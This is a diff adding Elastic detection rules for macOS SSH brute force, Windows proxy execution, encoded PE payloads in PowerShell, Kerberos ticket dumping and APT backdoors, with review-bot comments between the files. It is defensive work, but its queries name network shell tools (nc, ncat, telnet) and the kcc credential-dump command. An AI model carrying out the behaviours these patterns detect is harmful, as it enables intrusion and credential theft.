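Review bot: The DNS exclusion list in `query` carries broad wildcards such as `*.sharepoint.com`, `*.office365.com` and `*.office.com`, which narrows coverage more than the `description` ("unusual network connections") suggests, and the only hint of this is the inline `/* ... add FPs here */` comment inside the query string. The trailing `/* with runs=5 */` is likewise commented out, so the sequence fires on a single non-allowlisted lookup; whether that was a deliberate sensitivity choice is not recorded anywhere in the rule. Since `false_positives` already exists for this rule, suggest adding an entry such as `"IE started via COM that only resolves names under the allowlisted Microsoft/Office domains will not alert; review and tune the exclusion list for your environment."` so operators can tell what the exclusion covers without reading the EQL.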
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a high number (20) of macOS SSH KeyGen process executions from the same host. An adversary may attempt a brute force attack to obtain unauthorized access to user accounts.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential macOS SSH Brute Force Detected", + "query": "event.category:process and host.os.type:macos and event.type:start and process.name:\"sshd-keygen-wrapper\" and process.parent.name:launchd\n", + "references": [ + "https://themittenmac.com/detecting-ssh-activity-via-process-monitoring/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ace1e989-a541-44df-93a8-a8b0591b63c0", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "host.id" + ], + "value": 20 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 108 + }, + "id": "ace1e989-a541-44df-93a8-a8b0591b63c0_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_108.json b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_108.json new file mode 100644 index 00000000000..14d81e8f186 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_108.json 
@@ -0,0 +1,81 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious managed code hosting process which could indicate code injection or other form of suspicious code execution.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Managed Code Hosting Process", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.name : (\"wscript.exe.log\",\n \"cscript.exe.log\",\n \"mshta.exe.log\",\n \"wmic.exe.log\",\n \"svchost.exe.log\",\n \"dllhost.exe.log\",\n \"cmstp.exe.log\",\n \"regsvr32.exe.log\")\n", + "references": [ + "http://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "acf738b5-b5b2-4acc-bad9-1e18ee234f40", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "acf738b5-b5b2-4acc-bad9-1e18ee234f40_108", + "type": 
"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_108.json b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_108.json new file mode 100644 index 00000000000..742ab1012d2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_108.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the use of Windows Work Folders to execute a potentially masqueraded control.exe file in the current working directory. Misuse of Windows Work Folders could indicate malicious activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Signed Proxy Execution via MS Work Folders", + "note": "## Triage and analysis\n\n### Investigating Signed Proxy Execution via MS Work Folders\n\nWork Folders is a role service for file servers running Windows Server that provides a consistent way for users to access their work files from their PCs and devices. This allows users to store work files and access them from anywhere. When called, Work Folders will automatically execute any Portable Executable (PE) named control.exe as an argument before accessing the synced share.\n\nUsing Work Folders to execute a masqueraded control.exe could allow an adversary to bypass application controls and increase privileges.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the location of the WorkFolders.exe binary to determine if it was copied to the location of the control.exe binary. 
It resides in the System32 directory by default.\n- Trace the activity related to the control.exe binary to identify any continuing intrusion activity on the host.\n- Review the control.exe binary executed with Work Folders to determine maliciousness such as additional host activity or network traffic.\n- Determine if control.exe was synced to sync share, indicating potential lateral movement.\n- Review how control.exe was originally delivered on the host, such as emailed, downloaded from the web, or written to\ndisk from a separate binary.\n\n### False positive analysis\n\n- Windows Work Folders are used legitimately by end users and administrators for file sharing and syncing but not in the instance where a suspicious control.exe is passed as an argument.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Review the Work Folders synced share to determine if the control.exe was shared and if so remove it.\n- If no lateral movement was identified during investigation, take the affected host offline if possible and remove the control.exe binary as well as any additional artifacts identified during investigation.\n- Review integrating Windows Information Protection (WIP) to enforce data protection by encrypting the data on PCs using Work Folders.\n- Confirm with the user whether this was expected or not, and reset their password.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\"\n and process.name : \"control.exe\" and process.parent.name : \"WorkFolders.exe\"\n and not process.executable : (\"?:\\\\Windows\\\\System32\\\\control.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\control.exe\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/storage/work-folders/work-folders-overview", + "https://twitter.com/ElliotKillick/status/1449812843772227588", + 
"https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ad0d2742-9a49-11ec-8d6b-acde48001122", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "ad0d2742-9a49-11ec-8d6b-acde48001122_108", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_110.json b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_110.json new file mode 100644 index 00000000000..095ce3c30de --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_110.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the presence of a portable executable (PE) in a PowerShell script by looking for its encoded header. Attackers embed PEs into PowerShell scripts to inject them into memory, avoiding defences by not writing to disk.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Portable Executable Encoded in Powershell Script", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = 
authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n ) and not user.id : \"S-1-5-18\"\n", + "references": [ + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 110 + }, + "id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_106.json b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_106.json new file mode 100644 index 00000000000..894bb7a7435 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_106.json 
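Review bot: The `not user.id : "S-1-5-18"` clause in `query` suppresses every script block logged under the SYSTEM account, but neither the `description` nor the "False positive analysis" section of `note` mentions the exclusion or why it exists, so a reader tuning the rule cannot tell whether it targets a known noisy management product or is a blanket choice. Suggest recording the rationale in the false positive analysis, e.g. `- Script blocks executed as SYSTEM (user.id S-1-5-18) are excluded by the query; review this exclusion on hosts where scheduled tasks or services run PowerShell.` The single `TVqQAAMAAAAEAAAA` term also matches only one base64 alignment of the MZ header, so actual coverage is narrower than the description's "looking for its encoded header" implies; either widen the term list or state the limitation in `note`.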
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Kerberos credential cache (kcc) utility to dump locally cached Kerberos tickets. Adversaries may attempt to dump credential material in the form of tickets that can be leveraged for lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kerberos Cached Credentials Dumping", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:kcc and\n process.args:copy_cred_cache\n", + "references": [ + "https://github.com/EmpireProject/EmPyre/blob/master/lib/modules/collection/osx/kerberosdump.py", + "https://opensource.apple.com/source/Heimdal/Heimdal-323.12/kuser/kcc-commands.in.auto.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ad88231f-e2ab-491c-8fc6-64746da26cfe", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/", + "subtechnique": [ + { + "id": "T1558.003", + "name": "Kerberoasting", + "reference": "https://attack.mitre.org/techniques/T1558/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "ad88231f-e2ab-491c-8fc6-64746da26cfe_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ad959eeb-2b7b-4722-ba08-a45f6622f005_1.json b/packages/security_detection_engine/kibana/security_rule/ad959eeb-2b7b-4722-ba08-a45f6622f005_1.json new file mode 100644 index 00000000000..3f5e5da70cc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ad959eeb-2b7b-4722-ba08-a45f6622f005_1.json 
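Review bot: The `threat` mapping attaches sub-technique T1558.003 (Kerberoasting) to a rule whose query matches `kcc copy_cred_cache`, which appears to be a loose fit: the behaviour detected is copying locally cached tickets, not requesting service tickets for offline cracking, so the sub-technique is likely to mislead triage while the already-listed T1003 and the parent T1558 describe it adequately. Consider dropping the `subtechnique` array under T1558 so the mapping stays at technique level, unless the rule authors have a documented reason for the narrower mapping. It would also help to state in `description` that `copy_cred_cache` is the Heimdal `kcc` sub-command being matched, since `process.args:copy_cred_cache` is the only discriminating term in the query and the referenced opensource.apple.com page is the only place that explains it.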
@@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious process events executed by the APT package manager, potentially indicating persistence through an APT backdoor. In Linux, APT (Advanced Package Tool) is a command-line utility used for handling packages on Debian-based systems, providing functions for installing, updating, upgrading, and removing software along with managing package repositories. Attackers can backdoor APT to gain persistence by injecting malicious code into scripts that APT runs, thereby ensuring continued unauthorized access or control each time APT is used for package management.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious APT Package Manager Execution", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\n process.parent.name == \"apt\" and process.args == \"-c\" and process.name in (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"\n )\n ] by process.entity_id\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\",\n \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\"\n )\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ad959eeb-2b7b-4722-ba08-a45f6622f005", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 1 + }, + "id": "ad959eeb-2b7b-4722-ba08-a45f6622f005_1", + "type": 
"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ad959eeb-2b7b-4722-ba08-a45f6622f005_2.json b/packages/security_detection_engine/kibana/security_rule/ad959eeb-2b7b-4722-ba08-a45f6622f005_2.json new file mode 100644 index 00000000000..634524ad8ae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ad959eeb-2b7b-4722-ba08-a45f6622f005_2.json 
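Review bot: The `setup` text in this new rule file links the Fleet agent-policy guide at a pinned docs version (`https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`) while every other link in the same block uses `current`; the same pinned link is repeated in the version-2 copy of this rule (ad959eeb-..._2.json) and in the netcat rule (adb961e0-..._110.json). Suggest `https://www.elastic.co/guide/en/fleet/current/agent-policy.html` in all three so the guidance does not go stale when 8.10 docs are retired. Separately, the Defense Evasion entry under `threat` carries an empty `"technique": []` even though the rule is tagged `Tactic: Defense Evasion`; that is schema-valid, but either mapping a concrete technique or dropping the tactic entry would keep the ATT&CK coverage honest.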
